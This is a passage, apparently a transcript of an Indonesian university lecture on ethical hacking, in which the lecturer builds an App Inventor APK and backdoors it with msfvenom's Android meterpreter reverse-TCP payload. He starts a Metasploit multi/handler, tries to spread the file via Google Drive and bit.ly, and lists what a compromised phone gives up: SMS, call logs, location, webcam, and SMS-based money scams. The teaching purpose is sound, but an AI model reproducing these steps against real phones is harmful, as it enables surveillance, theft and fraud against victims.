Oke, kita mulai kuliahnya lagi aja ya Ini saya udah nyoba beberapa kali nih Sampai di booting segala macem Ah, tetep aja kagak kedetek yang namanya ADB nya Ini yang saya coba ini tadi barusan Bentar, saya tutup dulu bentar Eee Mana sih tadi APT Transport Sorry ini Oke Mana ini Catatan saya, eh sorry Ini saya tambahin ini sih tadi Katanya sih Kalau ditambahin ini User mode Add group Plug device Untuk user dollar ini Tapi saya harus booting dulu Dia akan deteksi Katanya Kalau Kalau Dicolok langsung detek Ternyata udah saya booting komputer Kagak detek juga Ya, sudah Harus di eksperimen lagi Supaya dia bisa detek Harusnya bisa deteksi Cuman belum tau triknya Jadi kalau Jadi orang harus rada optimis gitu Harusnya Kalau gak detek Pasti ada yang komplain biasanya Tapi Suka ada yang komplain Karena ini OS nya baru 24.04 Oh Screen belum muncul ya Sorry Minta maaf Oke Oke Mudah-mudahan Mudah-mudahan muncul Jadi saya berusaha Coba-nyoba Percobaan Sambil di booting Segala macam Saya tambahin ini Ada di google lah Ada yang tambahin ini gitu Supaya kalau Device di plug Ini kan plug device Kalau device di plug Dia ada group namanya Plug device Plug device User ini Kalau ada device di plug Dia langsung Deteksi Itu kira-kira gitu deh Teorinya sih Tetap Kagak ngepek Ini udah dicobain Di desktop saya Cobain laptop saya Sama Kagak ngepek Jadi Ada sesuatu yang Miss di Ubuntu 24.04 Kemungkinan security nya Ada tambahan Kalian Harus di Harus di Kasih izin dulu Kayaknya sih Soalnya Adbit kan Urusannya Langsung komunikasi Device ke device Kayaknya Di Ubuntu Yang makin baru Makin rewel Dia ininya Jadi ini nih Saya nyontekin disini Nah ini disini Saya search Pakai Ubuntu 24.0 Active Adbit driver Toto disini tulisin Kalau ini kan sama Yang ininya Gak ada Make sure Ini udah di enable Gak ngepek Nah ini Ada kayak ginian Ntar ya Ono lagi penasaran Sudu di message Harus dilihat di message ya Coba Oke oke Bentar Saya cabut Saya colok lagi Ini saya cabut Saya colok lagi Coba Kagak Kedetek Gak kedetek Gak kedetek Ini SDB mah Hard disk Ini kan Hard disk Ada sektor yang udah jelek Udah Oke Kita cancel aja ya Udah Sementara cancel dulu Gak berhasil Kita akan Sorry Masih penasaran Oke Kita akan Masuk ke topik Yang ini Ini ada Tiga Pakai APK tools Tapi dia Buat Cek APK Terus Disini ada Drawer Sama Cek APK Terus ada Mobile security framework Cek APK Juga Oke Satu lagi Ini bukan Ngecek APK Yang ini Ngejebolin APK Yang ini Parah Kita kan Coba yang ini Aja dulu Pakai doa Mudah-mudahan Bisa HP saya HPnya Udah disambung Belum ke Wifi nya Coba saya cek Dulu Bentar ya Sorry Harus Maka Wifi Masuk Ke Network Ya It's Sorry Salah Pencet Lagi Network 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 Oh Connection Connection Wifi On Oke Saya Connect Ke Password Tandu Tanda Seru Tanda Seru It's Salah Password Tanda Seru Cek Cek Inquite Internet Connection Oke Dia udah Connect Wifinya Sudah Saya Connect Oke Connected Wifi Kondisi Connected IP Nya Gak Tau Berapa Oke Saya Sedang Menjalankan Jadi Dari Empat Ini Dari APK Tools Dia Ngecek APK Ada Drosser Ngecek APK Lagi Ada Mobile Security Framework Ngecek APK Lagi Jadi Tiga Itu Ngecek APK Yang Ini Caranya Upload APK Kalau Yang Ini Pakai ADB Tapi Dia Ngomong Ke Ini Ngomong Ke Perangkat Android Jadi Ini Masalah Kita Punya Masalah Disini Cuman Ntar Jadi Kepikiran Bisa Nggak Cuman Ini Kali Linux Posisinya Ada Di Virtual Box Kemungkinan USB Nggak Ngomong Ke Kali Linux Virtual Box Jadi Saya Nggak Bisa Melakukan Itu Sebenarnya Tadi Ada Oke As Alah Discomputer Has Only 69 Megabyte Dispace Ignore Aduh Disini Kurang Gede Saya Coba Masuk Ada Bisa Saya Delete Nggak Kalau Ada File Yang Bisa Di Delete Lumayan Bisa Agak Hidup Sedikit Kalau Kalau Nggak Saya Nggak Bisa Gerak Soalnya Oke 96 Megabyte Itu Nggak Bisa Ngapa Ngapain Sebenarnya Alah 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 Coba Coba Nggak Bisa Loading Ntar Ini Saya Nggak Bisa Jalanin Ini Ada Kali Lagi Disini Ini Kalinya Hardware Dikasih Berapa Storage 52 Disini Storage Pantasan Cuma Dikasih 16 Yaudah Mending Dimatiin Aja Ini Kekecilan 16 Giga Kekecilan Storage Jadi Itu kan Cuma 95 Ini Percuma Matiin Lagi Salah Power Off Aja Karena Percuma Nggak Bisa Dijalanin Kalau Dijalanin Paling Nggak Kita Butuh Sekitar 30 An Oke Ini Saya Coba Cek Lagi Mana Kalinya Memorinya Dikasih 8 Giga Prosesor Tiga Oke Haris 50 Oke Saya Coba Start Disini Mudah Mudah Lebih Bagusan Daripada Yang Itu Auto Capture Keyboard Oke Ini Saya Enter Aja Biasanya Dia Complain Soal USB USB Nggak Bisa Dikoneksi Kalau Dia USB Mouse Integration USB Nggak ada Kata-kata USB Kita Nggak Tau Ini Pakai Doa Aja Kalau USB Nya Mau Ngomong Sama Si UFC Kali Yang Ada Di Virtual Box Mau Ngomong Dengan USB Di Motherboard Rada Selamat Bisa Kita Coba Oke Ini Lagi Keluarin GUI Nah Disini Kita Akan Coba Yang Langsung Ya APK Yang Ini Oke Kita Akan Pasang Backdoor Di Sebuah APK Konsekuensinya Saya harus ngajarin Anda-anda Bikin APK Paling blow on Di dunia Ini Caranya Paling blow on Buat APK Itu Kayak Gini Caranya Kita Masuk Ke Pelajaran Anak SD Sekolah Dasar Ada Up Inventor Enter Aja Aja Adventure 2 Ini Buat SD Buat Sekolah Dasar Kita Bisa Bikin APK Bego Banget Kalau Yang Ini Dan Ini Sebaiknya Emang Dibikin Buat Pelajaran Anak SD Ini Saya Buang Buang Nah Ini Contohnya Saya Akan Bikin APK Yang Blow On Aja Proyek Bisa My Project Saya Buang Semuanya Move To Trash Oke Jadi Semuanya Ada Di Trash Sekarang Saya Akan Bikin New Project Saya Kasih Nama Trash Oke Keluar Bentuknya Kayak Gini Saya Akan Bikin Supaya Ada Tombol Oke Kalau Tombolnya Dipencet Keluar Apa Enaknya Tombol Dipencet Keluar Keluar Gambar Kayaknya Menarik Keluar Gambar Eh Keluar Keluar Suara Aja Keluar Eh Keluar Apa Bisa Keluar Textbox Jangan Textbox Buat Input Saya Pengen Output Media Sudah Ini Aja Sudah Keluar Gambar Bisa Nggak Kalau Nggak Ini Aja Bentar Saya Gere Tulu Kesini Bentar Eh Saya Yang Pasti Saya Pasti Bisa Ini Saya Gere Pindah Oke Jadi Text Ini Saya Bisa Masukin Kata Kata Disini Nanti Saya Pengen Luarin Suara Jadi Bagian Textbox Saya Isi Suarakan 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 Enter Jadi Ini Diganti Jadi Suarakan Terus Saya Pengen Luarin Text To Speech Kesini Jadi Ini Komponen Nggak Bisa Dilihat Non Visible Komponen Text To Speech Jadi Kita Masukin Kata Kata Kalau Saya Klik Suarakan Apa Yang Ada Di Text Ini Akan Keluar Jadi Suara Sekarang Saya Akan Bikin Program Program Nya Bego Aje Jadi Saya Pengen Text To Speech When Dia Akan Call Text To Speech Suruh Ngomong Message Saya Ambil Dari Text Box Ini Ini Text Bag Text Text Cika Saya Tidak Meng Background Color Color Yang Dikeluarin Saya Akan Suruh Ngomong Text Yang Ada Disitu Jadi Text Yang Diteriak In Text To Speech Tempel Klik Terus Ini Ini Akan Dipanggil Kalau Tombolnya Di Pencet Jadi Ini When Button Satu Diklik Do Ini Jadi Ini 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 Dikerjakan Pada Set Button Diklik ini programnya cuma gini doang sih oke kalau Anda pengen download programnya ini saya Android apps nya di compile dulu, di build cuma nanti saya akan save jadi file juga supaya bisa di transfer ke ini ya ke ini nanti keluarnya QR Code, QR Code nya harus saya baca pakai HP nya eh, belum, belum, jangan, bukan QR Code nya gak bisa dibaca pakai HP yang ini, percuma kalau dibaca, soal ini programnya masih bersih, jadi saya harus kasih racun dulu ini program jadi, ini program bersihnya akan diracunin sama si kali Linux ini, ini ada QR Code nya saya gedein eh, gak bisa gak bisa digedein eh, gak bisa gak sih gak bisa digedein gak bisa digedein yaudah kita download aja APK nya ini, download APK nya namanya test APK 3,6 MB dan nah, sekarang saya masuk ke kali Linux ini kali Linux username nya kali password nya kali oke kali-kali kita masuk ke dalam kali Linux nya oke oke, oke oke, udah keluar semuanya saya akan buka terminal iyalah ini kali Linux sama handphone nya berada di jaringan yang sama tapi kalau kita lagi melakukan serangan di internet beneran kita harus taruh di hostingan kali Linux nya jadi di hosting kali Linux nya supaya dia dapat IP public kalau gak gak bisa ngomong sama HP yang ada di IP public juga oke ini kali Linux if config IP nya 192.168.0.212 jadi ini IP nya dia dapet 192.168.212 oke saya cek dulu IP saya berapa clear layer if config IP nya 03 apk ini ada file tes apk di 03 jadi saya akan copy in scp eh jangan saya balik dari sini aja lah scp 192.9803 download test.apk password masuk jadi tes apk saya berhasil copy ke kali Linux ini ada tes apk di kali Linux nya gitu ya clear coba saya lihat dulu cook tadi apa sih oh ini cookies saya buang ini udah gak dipakai ya oke clear oke sekarang saya masuk lagi ke sini ini udah beres urusannya ini udah beres urusannya ini udah beres urusannya ini sementara beres dulu udah putus asa gak berhasil ini youtube ini facebook ini maghrib chat kipete ini buang ini buang oke kita masuk ke sini kita akan melakukan seperti ini pakai MSF venom MSF venom fungsinya adalah ngasih racun ngasih backdoor ke apk oke kalau disini kan backdoor apk kita apk nya adalah tes apk oke kalau ini bikin langsung kalau ini kita kalau yang ini teknik buat menginfeksi yang kita pakai yang ini ya original apk terus infected apk jadi kita punya tes apk yang original kemudian kita infeksi yang perlu kita masukin adalah ini kita kasih tau payload minus pay adalah payload payload nya adalah android metropater reverse tcp host nya ip nya 192.980.212 port nya bebas suka-suka kita terus kita infeksi apk nya oke kita akan melakukan yang ini cuma supaya saya bisa gak usah copy paste kepaksa saya buka si wiki nya ya lama eh ngebukanya eh oke lagi loading kelihatan itu lagi muter dia loading oke ini udah mulai kebuka oke saya akan masuk wiki saya supaya bisa copy paste aja sih already running oke sekarang saya akan buka makhluk ini ono center padahal udah dikasih 3 core sama memori 8 giga loh harusnya kenceng eh saya akan cari oh saya gak oh tadi ada di kuliah ya bukan disini ya salah ya tapi gak apalah nama safe venom ini oke ini kalau ini bukan menginfeksi dia generate trojan oke bukan infeksi yang infeksi adanya di halaman yang hands on ini ya berarti adanya di ethical hacking ntar balik di adanya di ethical hacking ada di mobile hacking terus adanya di ini oh salah oke ini dia saya gedein ini perintahnya ya jadi ada dua yang ini mengenerate membuat tidak ada apk aslinya kita bikin apk aja yang isinya cuman racun doang kalau ini apk asli kita racunin kita infected jadi saya akan coba yang ini saya biasanya langsung bikin racun biasanya cuman kalau racun orangnya yang install akan curiga soalnya apknya kenapa kosong gak ada apa-apanya ini gak ada apa-apanya kalau yang ini kalau yang kedua ini ini ada apk beneran dikasih racun dan ini kalau berhasil kita bisa tes nanti pakai apk tool apa segala macam kita bisa tes nanti jadi ini bisa dipakai buat ngetes sekalian ya jadi saya akan kasih racun disini ini oke oke saya gedein dulu view zoom in sudo su eh kali paste eh coba bener dulu lihat dulu oke tes apk ada disitu saya paste disini oke nah ipnya adalah 212 19292 19298 0212 portnya nah ini bebas merdeka portnya saya kasih misalnya portnya angka kalau orang Cina kan bilangnya 8 ya 8 8 8 8 8 ya supaya untung katanya gak tau itu kepercayaan orang selono kita ngikut-ngikut aja originalnya namanya tes tes apk, racunnya namanya misalnya kita kasih nama tes keren, gitu ya enter kita kasih bikin apk yang diracunin mudah-mudahan berhasil kalau gak berhasil lama banget loh aduh bikinnya lama banget kita akan bikin yang kedua saya bikin dua apk aja ya zoom in zoom in zoom in oke sekarang kita akan bikin yang kedua pakai yang ini langsung aja saya kasih nama backdoor tapi, bukan tes oke eh, sorry salah oke pasted eh kok gak mau oke walah, walah, walah tu, saya ambil lagi oke gak mau eh, kacau oh, disini caranya jadi saya akan bikin apk yang kedua 192-08-0212 portnya misalnya sama 8888 tapi namanya beda ya tadi tes keren yang ini namanya backdoor mana yang jadi duluan coba kita lihat ini backdoor lagi proses yang ini bukan tarik kemana dia oh ini kenapa gak pada jadi halah siap oh ini dia oke eh, backdoor yang jadi duluan eh dia langsung bikin buat android terus eh apa arsitekturnya dalvik dalvik eh raw payload besarnya 10 kilo backdoor apk jadi oke kalau yang ini jadi kagak yang satu lagi ini backdoor yang yang ini backdoor yang yang itu mana yang ini sini ya oke oke dia butuh apk tools please edit oke berarti saya harus install dulu ya jadi ternyata kalau kita mau menginfeksi apk kita butuh apk tools tapi apk toolsnya juga bisa nganalisa ini ini terinfeksi atau enggak jadi keren sih eh cuma kita punya masalah eh kita kita tidak bisa ngedownload apk toolsnya ini ada masalah ininya not phone nih oke apk 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 update oke saya update dulu bentar mudah-mudahan rada rada selamat tadi tidak di update soalnya jadi saya update dulu si kali linuxnya eh ini rolling nama oke tadi gak di update soalnya sebelum-sebelumnya ini belum pernah saya update sih eh apa repositorynya belum di update sekarang saya update dulu mudah-mudahan dia tidak seri well ini mudah-mudahan pakai doa install apk tools yes oke gak rewel ini ke download semua tadi gak berhasil di download karena belum saya update repositorynya sudah sekarang sudah di update repositorynya sekarang dia ngedownload semua apk yang dibutuhkan buat bikin apk toolsnya jadi ini sekaligus berarti saya harus tambahin catatan disini disini harus tambahin disini harus apt update dulu terus apt install apk tools kalau enggak ini gak mau dia nginjek buat apa namanya buat apk bersih kalau yang ini kan kita bikin apk bohongan aja yang gak ada isi apa-apanya oke sorry ini kita balik lagi ke sini sorry salah sini oke ini lagi nginstall nah tadi take portnya 8888 ya sekarang saya harus ngirim si apknya ke hp gimana cara ngirimnya yang seru nih ngirimnya paling gampang buat ngirim saya kirim lewat google doc seasonernya oke ini wifi sudah tersambung di hp nya oke saya akan tapi kalau google doc panjang url nya gimana biar pendek pakai sID pakai bit.ly kali ya oke intinya saya harus ngirim to software ini jadi yang satu lagi lama nunggunya karena lama udahlah saya biarin dulu aja ini biarin ini lama banget sih coba masih kayak gini masih 0% progress nya buset ini juga ngedownload nya 103MB ini lambat kalau ditaruh di virtualbox ternyata oke dia lagi ngablit semuanya kalau gitu yang udah jadi aja saya kirim oke kita punya backdoor.apk saya kirim ke scp backdoor ke sini dulu ke komputer saya yang saya pakai demo sekarang saya taruh di home directory yes oke sekarang backdoor nya sudah ada di home directory coba kita lihat disini ada gak saya gedein dulu biar keliatan di zoom lebih enak mana di ini ada backdoor.apk nya saya akan upload ini lagi nyari url yang gampangnya apa ya saya bisa paling gampang sih masukin google drive sebenarnya cuma nanti waktu sharing nya yang jadi seru urusannya karena panjang url nya biasanya harus dipendekin dulu oke upload file backdoor mana backdoor tadi eh ini di folder download salah b b a b ini backdoor kita punya masalah dengan google drive karena dia biasanya scanning file kalau file nya ada trojan biasanya suka rewel gimana caranya bisa transfer antar ini oh bisa gak saya ftp bentar apa ya pakai apa ya enggak ini biar di upload dulu bentar kita coba aja ini backdoor apk sudah masuk coba drive saya bisa gak bisa gak saya sharing cari backdoor apk apk ee iyalah backdoor apk saya akan bagikan ke semua orang oke salin link nah ini yang seru nih salin link ee buat mendekin pakai apa bitly gitu ya kita cobain ya mau gak dia login using google lanjutkan oke ee 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 mana next nya nih kok gak ada next nya sih saya nyari next oh ini ada di bawah sini continue aduh education lah mau ada education ya ee ya seginilah other lah continue alah alah oh ini aja ya udah saya udah dapet saya akan coba pakai ininya aja ya ee link yang didapet itu saya akan nge-web pakai link itu buka browser di hp ini lagi buka browser di hp sekarang ya masuknya spotify langsung ini bro ini hp punya anak sih tadinya udah gitu dia udah gak suka karena hpnya jelek kekecilan ya begitu dah nasib nasib bapaknya itu bit li li apa slash ee tiga c gede c w 7 t besar cu oke go oke ah kena kena lo gak bisa maaf anda tidak dapat mengakses item ini karena item ini melanggar persyaratan layanan kami gitu dia bilang gitu kata google ya karena si google google drive nge-can ini sih nge-can file jadi dia gak mau kalau file nya udah kena trojan jadi ini saya delete dulu percuma aja file nya ditaruh sini ntar backdoor caranya nge-delete gimana caranya backdoor mau gue delete ini ya buka jendela baru gak bisa di delete ini teh gimana cara nge-delete ya saya gak mau ngebuka ini mau di delete aja ah gimana udah percuma ada disini juga gak bisa dipakai soalnya si google nya ngamuk jadi google udah proteksi jadi kita ntar bisa gak dicari disini ya beranda gak bisa eh yaudah sementara gak bisa oke karena saya ada lagi ada disini saya masuk sini aja dulu ntar ya ini saya share di drive aja ini ada eee text buku sih menjaga AI tetap terkendali ini saya presentasiin tadi di bssn eee supaya anda-anda bisa dapet manfaat juga saya bagiin aja mumpung lagi lagi ada di google drive saya kasih linknya aja saya taruh di chat oke selesai nah ini udah beres sekarang gimana caranya ngirim file itu ke situ atau saya copy ada ada apa ya win ada scp gak disini ya helps install kalau gak ftp scp sih coba saya lihat disini dulu ya playstore scp ini mah scp dengan game nya eee rtp atau scp scp tool gak ada eee tar hmm paling gampang saya taruh disini sih sebenarnya tar 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 ini cara rada kurang ajar itu udah mau jam 7 aja alah waktu teh sempit pisahnya aduh tinggal 5 menit saya akan kasih cerita apa yang akan terjadi jadi ini kalau berhasil di install di hp oke hp akan ngajak ngomong si apa si android eh si android lagi kali linux cuman kali linux nya harus saya jalanin ini dulu jadi caranya saya kasih lihat di kali linux nya ya jadi ini kali linux saya harus jalanin msf tadi kan venom saya harus cari ini msf console oke ini apa nih wuh dari tadi saya nginstall apk tus masih belum berhasil ya ya nasib lah oke ini jalanin msf console nya oke ini kalau udah jalan kira-kira keluarnya seperti ini msf console ini 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 baru jalanin ini doang kemudian kita harus ngasih tau kita akan menjalankan payload android meter perter reverse reverse ftp persis seperti ini sih sebenarnya oke android meter perter reverse ftp oke kita harus pakai handlernya yang exploit multi handler kemudian payload android reverse ftp terus kita harus set apa host nya si android nya berapa terus port nya sorry kali linux nya berapa port nya berapa terus exploit nah kalau kita jalanin exploit dia akan stand by untuk nunggu sambungan dari apk yang udah kita tanem kita berhasil install di hp tapi tadi masalahnya kita harus bisa transfer ke hp nya paling gampang sih pakai group whatsapp nyebarinnya gitu paling gampang cuman yang ini hp nya gak ada whatsapp nya jadi gak bisa tadi yang mau saya lakukan adalah saya akan buka website web lokal di komputer lokal kemudian saya taruh di komputer itu supaya bisa di download dari hp nya oke nah sekarang saya akan langsung aja kesini oke ini udah keluar nah disini saya harus tulis aja atau kita paling enak sih buka browser ini browser oke uth sorry yang tadi ini ya eh ada gak disini oh ini ada disini saya ambil aja ya jadi ini udah kita jalanin kita akan use exploit multi handler nya akan diaktifin dulu ini satu klik kanan copy masukin ke sini paste oke sekarang sudah standby di multi handler exploit multi handler bagusnya dari apa MSF dia bisa handle ada dia punya 2397 exploit gitu ya jadi enak banget exploit nya macam-macam buat Windows buat Linux buat apa gitu banyak banget exploit nya bisa kita kita explore aja sekarang kita kasih tau payload yang kita pakai adalah Android metropater reverse FTP klik kanan copy mana tadi eh sorry ini ya oke paste selection oke sekarang dia udah kasih tau payload nya apa nah sekarang urusannya adalah set lhost jadi set lhost IP nya berapa set lport port nya berapa oke kalau ini harus manual diketik supaya aman set lhost IP nya adalah 192.980.212 konsekuensi dengan IP ini kita hanya bisa main ini di jaringan lokal kalau kita mau pakai internet beneran IP nya harus IP publik enter terus set lport tadi kita setnya 8888 enter nah terus udah gitu ini udah diset semua jadi udah standby buat sambungan dari luar kita tinggal exploit aja exploit enter dia udah siap nerima sambungan di IP 192.980.212 di port 8888 gitu ya kalau aplikasinya kita install di HP HP nya akan langsung ngomong ke sini dan kita bisa komunikasi sama HP nya kira-kira kayak gitu nah kalau kita komunikasi sudah terjadi kita bisa ngirim perintah yang ngaco-ngaco misal ini saya akan kasih lihat yang ngaconya ya wiki eh salah msf eh salah msf ini ada attack android disini contohnya jadi kita bisa bikin apa APK yang udah terinfeksi tadi terus kita jalanin ini persis sama kan kira-kira nah kalau udah berhasil connect kita bisa kirim perintah ke HP ini perintah-perintah yang bisa dikirim perintahnya lebih banyak daripada yang ada di daftar ini ada di kita bisa googling lah banyak yang ngasih perintah-perintah ini kita bisa cek route apakah HP nya di route kita bisa geolocate lokasi HP keluar dimana kita bisa dump call lock jadi kita bisa ngambil semua catatan handphone nya pernah handphone kemana aja kita bisa dump sms kita bisa ngambil catatan sms udah pernah sms kemana aja isinya apa keluar semua bahkan kita bisa kirim sms ke nomor tujuan dengan berita apa nah ini yang bahaya banget jadi setelah kita dump sms kita bisa ngirim ke nomor tujuan beritanya apa aja jadi bisa aja perintahnya beritanya kayak gini mas transfer duit dong saya lagi di misalnya di Jogja apa dompetnya ke copet minta transfer duit supaya bisa saya pakai kiris bisa bayar apa gitu yaudah karena nomor HP nya kita kenal disangkanya beneran di transfer duitnya gitu ya ini nah ini yang bahayanya disitu skenario nya kira-kira gitu nah kemudian disini ada dia bisa nempel webcam webcam bisa ditempel kita bisa lihat kalau webcam list kita bisa lihat webcam nya ada berapa depan belakang kita bisa tempel nomor berapa nomor 1 atau nomor 2 kita bisa stream kalau stream video sama audionya bisa ketarik ke kali linux nya jadi keluar semua sih gitu cuman yang lainnya belum bisa kita cobain ya karena gak bisa transfer itu si si APK yang sudah terinfeksi tadi karena ininya ngamuk langsung si google drive nya oke gak kerasa udah jam 7 waktunya kurang dan gagal semua sebetulnya hari ini mungkin kita harus coba minggu-minggu depan lagi oke cuman caranya gini deh tolong kerjain itu quiz UTS UAS mudah-mudahan Anda semua nanti dapet nilai A semua dari kuliah ini oke sekian dulu terima kasih mudah-mudahan semua sehat dan semuanya lancar bila tukul ya assalamualaikum warahmatullahi wabarakatuh oke kasih sama-sama saya off juga ya saya live juga terima kasih selamat menikmati